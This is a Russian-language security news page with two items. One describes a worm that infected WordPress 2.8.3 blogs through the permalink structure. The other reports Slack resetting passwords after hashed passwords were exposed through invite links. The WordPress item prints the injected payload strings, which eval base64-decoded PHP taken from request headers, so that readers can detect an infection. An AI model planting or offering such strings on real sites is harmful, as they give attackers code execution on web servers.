Массовое заражение блогов на WordPress

Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. После этого вышел WordPress 2.8.4, устраняющий эту уязвимость. Однако, как оказалось, далеко не все блогеры следят за обновлениями.

В эти выходные разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8.

Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы пользователей и начинает добавлять спам и ссылки на вредоносный контент в архивные топики.

Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие следующего кода.

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

или ошибки

‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

Если есть такой код или фид сломан, то блог инфицирован.

Процедура удаления червя представляет собой нетривиальную задачу .

источник 

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Яндекс Дзен, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Slack сбросил пароли пользователей после раскрытия хешированных данных

Разработчики корпоративного мессенджера Slack сбросили учётные данные около 0,5% пользователей после обнаружения уязвимости, из-за которой раскрывались хешированные пароли при создании или отзыве расшаренных ссылок для приглашения в рабочие пространства.

Напомним, ещё в сентябре 2019 года корпоративный мессенджер хвастался более 12 миллионами активных пользователей ежедневно.

«Если условный пользователь создавал или отзывал ссылки для приглашения, Slack передавал его хешированный пароль другим участникам рабочего пространства», — пишут представители Slack.

Отмечается также, что пароли были хешированы с солью, которая добавляет дополнительный слой безопасности, защищающий учётные данные от атак вида брутфорс. Конкретный алгоритм хеширования Slack пока не раскрывает.

Сама уязвимость, судя по всему, затрагивала всех пользователей, которые создавали или отзывали инвайт-ссылки в период между 17 апреля 2017 года и 17 июля 2022-го. О проблеме сообщил неназванный исследователь в области кибербезопасности.

Стоит отметить, что хешированные пароли не были видны клиентам Slack. Разработчики корпоративного мессенджера уточняют:

«Нет никаких оснований полагать, что посторонние лица получили доступ к паролям в виде простого текста. Тем не менее мы сбросили пароли затронутых пользователей из соображений безопасности».

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Яндекс Дзен, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru